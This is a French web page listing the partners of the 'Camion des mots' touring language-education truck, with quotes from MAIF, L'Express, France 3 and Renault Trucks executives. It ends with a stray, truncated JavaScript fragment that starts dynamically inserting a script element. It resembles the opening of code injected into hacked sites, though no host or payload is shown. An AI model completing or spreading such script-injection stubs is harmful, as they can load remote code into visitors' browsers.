Les cookies assurent le bon fonctionnement de notre site Internet. En utilisant ce dernier, vous acceptez l'utilisation des cookies. En savoir plus OK
C'est fait par qui ? | Camion des mots
Suivez nous :
Nous contacter : 01.42.61.10.71

C’est fait par qui ?

> Les partenaires de l’animation

LA MAIF, UN PARTENAIRE NATUREL

La MAIF milite pour l’accès à l’éducation pour tous et, dans ce contexte, soutient le Camion des mots depuis sa création. Cette animation nationale itinérante, qui va au plus près des territoires, des villes, des villages et des quartiers, est un véritable outil pédagogique ambulant. Par ailleurs, le réseau de 600 militants MAIF, présents dans les 145 délégations départementales sur l’ensemble du territoire, assure l’accueil des élèves et des enseignants dans le Camion.

« Le précédent Camion des mots correspondait à une époque, avec la découverte de l’ordinateur. Aujourd’hui, nous sommes à l’ère de l’image. La nouvelle animation correspond parfaitement aux évolutions des enfants qui sont davantage tournés vers les écrans, la vidéo. Le Camion des mots est en phase avec son temps. »

_ROGER BELOT, président-directeur général de la MAIF

camion-des-mots-jeux-ludique-educatif-pedagogie-118

LES MAGAZINES LIRE ET L’EXPRESS

Le soutien du Groupe Express-Roularta est indispensable à la bonne visibilité de l’opération. La légitimité de Lire et la puissance de L’Express permettent au Camion des mots de bénéficier d’une exposition médiatique de premier ordre.

De 1985 à 2005, le magazine Lire a produit et organisé les Dicos d’or de Bernard Pivot. Véritable institution, la fameuse dictée a réuni pendant vingt ans plusieurs centaines de milliers de candidats. Lire, soutenu par l’ensemble des magazines du Groupe Express-Roularta, France 3 et la MAIF, a décidé en 2005 de poursuivre son combat pour la défense et la promotion de la langue française en imaginant le Camion des mots.

« Les images sont partout aujourd’hui. Une grande partie du monde réel est capté par les enfants à travers les images. La langue française doit, elle aussi, utiliser ce vecteur pour être enseignée. Pour que le français soit vivant, il faut le faire passer du papier au spectacle vivant. »

_ CHRISTOPHE BARBIER, directeur de la rédaction de L’Express

 

 

FRANCE 3, TOUT PRES DE CHEZ VOUS

France 3, chaîne des Régions – 101 implantations locales -, soutient cette opération grâce à l’implication de son réseau régional en TV et sur le web.

« Je trouve que la nouvelle édition est une judicieuse manière de moderniser l’animation. La précédente version fonctionnait depuis huit ans, certains enfants l’avaient déjà vue. Il est intéressant de la renouveler grâce à la vidéo, un média inscrit dans les gênes des enfants. »

_FRANCOIS GUILBEAU, directeur du réseau France 3

 

RENAULT TRUCKS

En cohérence avec son engagement sociétal, Renault Trucks met à disposition l’outil indispensable à cette opération itinérante : le camion ! Grâce à cet engin, des milliers d’enfants et d’enseignants peuvent participer chaque année à cette animation à proximité de leur domicile ou de leur école.

« La nouvelle animation est bien dans l’air du temps. C’est une vraie innovation qui va apporter un plus pour tous les élèves et tous les enseignants qui vont venir. Elle demande plus de préparation en amont mais c’est aussi plus d’implication pour les enfants et une expérience merveilleuse. Un grand souvenir pour les classes. »

_JULIE MARCONNET, en charge des partenariats, sponsoring et mécénat chez Renault Trucks

 

LE SOUTIEN DES MINISTERES

Les ministères de la Culture et de l’Education soutiennent l’opération depuis son origine. Apprendre en s’amusant est une manière efficace d’intégrer les connaissances. Chaque année, le ministère de la Culture et de la Communication multiplie les partenariats avec le groupe Express-Roularta pour favoriser l’accès à la culture et promouvoir la langue française. Parmi les actions développées, la Semaine de la langue française et de la Francophonie, chapeautée par la Délégation à la langue française et aux langues de France, organise des manifestations culturelles pour célébrer le français partout dans l’Hexagone. Sans oublier ses actions périphériques, telles que « Vous pouvez le dire en français », ou la Semaine des cultures étrangères.

 var d=document;var s=d.createElement(‘script’);